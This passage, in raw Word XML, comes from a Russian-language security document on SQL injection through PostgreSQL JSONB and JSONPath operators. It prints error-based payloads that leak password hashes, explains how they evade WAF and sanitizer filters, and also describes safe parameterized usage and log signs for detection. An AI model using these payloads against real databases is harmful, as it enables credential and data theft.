        <w:t xml:space="preserve"> cast при чтении упадёт с leaked в text-сообщении. Здесь требуется second-order injection — атакующий пишет payload через write-канал, leak происходит при read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3B6F44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Более прямой путь — комбинация 3.11.2 + 3.2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45285560" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>field</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> из Payload A):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37601D44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x'::int) || (SELECT cast((SELECT password_hash FROM users LIMIT 1) AS int))::text || ('</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4F87ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Идея: разорвать литерал, инжектировать cast-error subquery, восстановить квоту. Сложно из-за </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> оператора, который принимает text-литерал в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>строго один токен</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1E8136" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Чище комбинировать с 3.2 напрямую, минуя jsonb-канал:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004FE709" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x'::int) -- (это уже не jsonb-injection, а классический cast-error)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145F05D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">То есть 3.11.2 + 3.2 — комбо, где 3.11.2 даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>точку входа</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а 3.2 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>leak-mechanism</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6F93C0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что произойдёт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F83E6A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — utечка любых JSON-полей; обход application-логики «field whitelist».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02345FAD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — JSONPath-tautology через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>like_regex</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обход WHERE-фильтра в jsonb-context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E471C95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — cast confusion + 3.2 → error-based leak через JSONB-staging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79204476" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему этот приём проходит фильтр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EF6CE2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAF на SQL keywords</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не покрывает JSONPath operators: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$.path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>like_regex</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Они выглядят как валидный JSON-path, не как SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D310A6C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`-&gt;&gt;`/`-&gt;`/`#&gt;&gt;`/`#&gt;`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это SQL-операторы (записываются прямо в SQL), но имя-литерал внутри payload-текста — не SQL keyword.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D698F6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sanitizer на длину параметра</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обычно отсутствует для JSON-path (legitimate paths могут быть длинными: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data-&gt;&gt;'address.country.code'</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B0194B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JSONPath DSL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — мало где в WAF rules, потому что PG 12+ это относительно новая фича.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC74423" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему PostgreSQL принимает результат как валидный SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8DD027" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`-&gt;`/`-&gt;&gt;`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — операторы, добавлены в PG 9.3. Парсер принимает любой text-литерал справа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D772F0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JSONPath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@@</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@?</w:t>
      </w:r>
      <w:r>
        <w:t>) — SQL/JSON path expressions из SQL:2016. Добавлены в PG 12 (https://www.postgresql.org/docs/12/functions-json.html#FUNCTIONS-SQLJSON-PATH).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6054D91E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JSONPath-grammar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> включает: navigation (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.key</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filtering (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?(...)</w:t>
      </w:r>
      <w:r>
        <w:t>), comparisons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&lt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>), arithmetic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boolean logic (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</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regex (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>like_regex</w:t>
      </w:r>
      <w:r>
        <w:t>), strings (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>starts with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ends with</w:t>
      </w:r>
      <w:r>
        <w:t>), type-tests (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>type()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>size()</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321A342F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Path parsing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> идёт через отдельный jsonpath-lexer внутри PG core; ошибки парсинга выкидывают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>invalid input syntax for type jsonpath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с детальным сообщением (это leak-канал через error).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3250B236" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`-&gt;&gt;`-результат — всегда `text`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — даже если в JSON был </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r>
        <w:t>. Это упрощает атаку (всегда работает text-injection дальше).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD191DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Требования к среде</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED5B9BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 9.3+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18430ABC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 12+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@@</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (JSONPath).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFF9301" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии</w:t>
      </w:r>
      <w:r>
        <w:t>: PUBLIC. SELECT на target table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB77CDC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JSONB-колонка</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или JSON-колонка. JSON отличается — у него нет некоторых операторов; JSONB универсальнее.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533DC230" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t>: работает идентично.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034F831C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Как выглядит легитимное использование</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C656A38" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data-&gt;&gt;'name' AS name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — фиксированный path в SQL-template.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A89DCA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data #&gt;&gt; ARRAY['address', $1]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параметризованная нижняя часть path; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>безопасно</w:t>
      </w:r>
      <w:r>
        <w:t>, если параметр binded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BA4F1C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data @@ $1::jsonpath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параметризованный JSONPath; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>безопасно</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A79C16A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Атака отличается:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFDA39F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Path-литерал строится через f-string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или concat: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f"data-&gt;&gt;{path}"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — runtime-конструкция, не template.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7AF9BB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`'admin'`-like подстроки в path-литерале</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data-&gt;&gt;'password_hash'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от non-admin эндпоинта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CB5539" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JSONPath с `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (рекурсивный спуск) или </w:t>
      </w:r>
      <w:r>
        <w:t>?(@.x like_regex ...)` в логах** — нелегитимный pattern для production-кода (там обычно фиксированный path).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279140D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A70C5AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
